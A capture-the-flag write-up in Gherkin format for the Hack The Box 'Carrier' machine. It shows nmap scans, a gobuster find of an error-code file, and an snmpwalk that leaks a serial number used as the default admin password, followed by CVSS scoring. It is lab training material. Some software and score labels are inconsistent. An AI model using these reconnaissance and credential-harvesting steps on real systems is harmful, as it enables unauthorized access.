# language: en

Feature:
  TOE:
    HTB Carrier Machine
  Page name:
    Hack The Box
  CWE:
    CWE-522: Insufficiently Protected Credentials
  Goal:
    Getting user.txt flag and claiming user ownership of the machine.
  Recommendation:
    Change the admin password.

  Background:
  Hacker's software:
    |    <name>    |  <version>   |
    | Kali Linux   | 3.30.1       |
    | Firefox ESR  | 60.2.0esr    |
    | Burpsuite CE | 1.7.36       |
    | OpenVPN      | 2.4.6        |
    | nmap         | 7.70         |
    | metasploit   | 14.17.17-dev |
  TOE information:
    Machine's software:
      |     <name>    |  <version>  |
      | Linux         | Ubuntu 4    |
      | Apache Tomcat | 2.4.18      |
      | Quagga        | 0.99        |
    Machine's services:
      | <service> | <port> |
      | ftp       | 21     |
      | ssh       | 22     |
      | dhcps     | 67     |
      | http      | 80     |
      | snmp      | 161    |
    Given that I use OpenVPN
    Then I access the machine using the IP 10.10.10.105

  Scenario: Normal use case
    Given I access the IP
    Then I can see a logo image
    And two error codes: 45007 and 45009
    And a login form

  Scenario: Dynamic detection
  The admin user hasn't changed the default password
    Given that I run the following nmap command:
    """
    nmap -sC -sV -oA nmap/initial 10.10.10.105
    """
    Then I get the output:
    """
    Nmap scan report for 10.10.10.105
    Host is up (0.18s latency).
    Not shown: 997 closed ports
    PORT   STATE    SERVICE VERSION
    21/tcp filtered ftp
    22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
    |   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
    |_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
    80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
    | http-cookie-flags:
    |   /:
    |     PHPSESSID:
    |_      httponly flag not set
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Login
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Given that I run the following nmap command:
    """
    nmap -sC -sV -sU -oA nmap/initial 10.10.10.105
    """
    Then I get the output:
    """
    Nmap scan report for 10.10.10.105
    Host is up (0.19s latency).
    Not shown: 996 closed ports
    PORT     STATE         SERVICE VERSION
    67/udp   open|filtered dhcps
    161/udp  open          snmp    SNMPv1 server; pysnmp SNMPv3 server (public)
    | snmp-info:
    |   enterprise: pysnmp
    |   engineIDFormat: octets
    |   engineIDData: 77656201e06908
    |   snmpEngineBoots: 2
    |_  snmpEngineTime: 2h34m17s
    1993/udp  open|filtered snmp-tcp-port
    50612/udp open|filtered unknown
    """
    Given that I use gobuster to find files and folders
    Then I find the doc public folder
    And inside I found the error codes file
    Then I read the following text in the document:
    """
    45007
    Invalid or expired license.
    45009
    System credentials have not been set
    Default admin user password is set (see chassis serial number)
    """
    Then I conclude that I can search for the chassis serial number
    And obtain the password.

  Scenario: Exploitation
    Given that I run the following command:
    """
    snmpwalk 10.10.10.105 -c public -v 1
    """
    Then I get the following output:
    """
    iso 3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
    """
    And I suppose that SN means serial number
    Then I use NET_45JDX23 as the admin password
    And it logs in
    Then I can conclude that I have earned admin privileges
    But given to the invalid license, functionality is limited

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.0/10 (Low) - AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    3.8/10 (Low) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    3.0/10 (Medium) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date <18/10/2018>
